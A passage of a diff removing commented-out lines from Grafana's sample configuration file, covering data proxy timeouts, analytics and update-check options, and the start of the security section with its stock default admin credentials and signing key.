-;keep_alive_seconds = 30 - -# How many seconds the data proxy waits for a successful TLS Handshake before timing out. -;tls_handshake_timeout_seconds = 10 - -# How many seconds the data proxy will wait for a server's first response headers after -# fully writing the request headers if the request has an "Expect: 100-continue" -# header. A value of 0 will result in the body being sent immediately, without -# waiting for the server to approve. -;expect_continue_timeout_seconds = 1 - -# The maximum number of idle connections that Grafana will keep alive. -;max_idle_connections = 100 - -# The maximum number of idle connections per host that Grafana will keep alive. -;max_idle_connections_per_host = 2 - -# How many seconds the data proxy keeps an idle connection open before timing out. -;idle_conn_timeout_seconds = 90 - -# If enabled and user is not anonymous, data proxy will add X-Grafana-User header with username into the request, default is false. -;send_user_header = false - -#################################### Analytics #################################### -[analytics] -# Server reporting, sends usage counters to stats.grafana.org every 24 hours. -# No ip addresses are being tracked, only simple counters to track -# running instances, dashboard and error counts. It is very helpful to us. -# Change this option to false to disable reporting. -;reporting_enabled = true - -# The name of the distributor of the Grafana instance. Ex hosted-grafana, grafana-labs -;reporting_distributor = grafana-labs - -# Set to false to disable all checks to https://grafana.net -# for new versions (grafana itself and plugins), check is used -# in some UI views to notify that grafana or plugin update exists -# This option does not cause any auto updates, nor send any information -# only a GET request to http://grafana.com to get latest versions -;check_for_updates = true - -# Google Analytics universal tracking code, only enabled if you specify an id here -;google_analytics_ua_id = - -# Google Tag Manager ID, only enabled if you specify an id here -;google_tag_manager_id = - -#################################### Security #################################### -[security] -# disable creation of admin user on first start of grafana -;disable_initial_admin_creation = false - -# default admin user, created on startup -;admin_user = admin - -# default admin password, can be changed before first start of grafana,  or in profile settings -;admin_password = admin - -# used for signing -;secret_key = SW2YcwTIb9zpOOhoPsMm - -# disable gravatar profile images -;disable_gravatar = false - -# data source proxy whitelist (ip_or_domain:port separated by spaces) -;data_source_proxy_whitelist = - -# disable protection against brute force login attempts -;disable_brute_force_login_protection = false - -# set to true if you host Grafana behind HTTPS. default is false. -;cookie_secure = false - -# set cookie SameSite attribute. defaults to `lax`. can be set to "lax", "strict", "none" and "disabled" -;cookie_samesite = lax - -# set to true if you want to allow browsers to render Grafana in a ,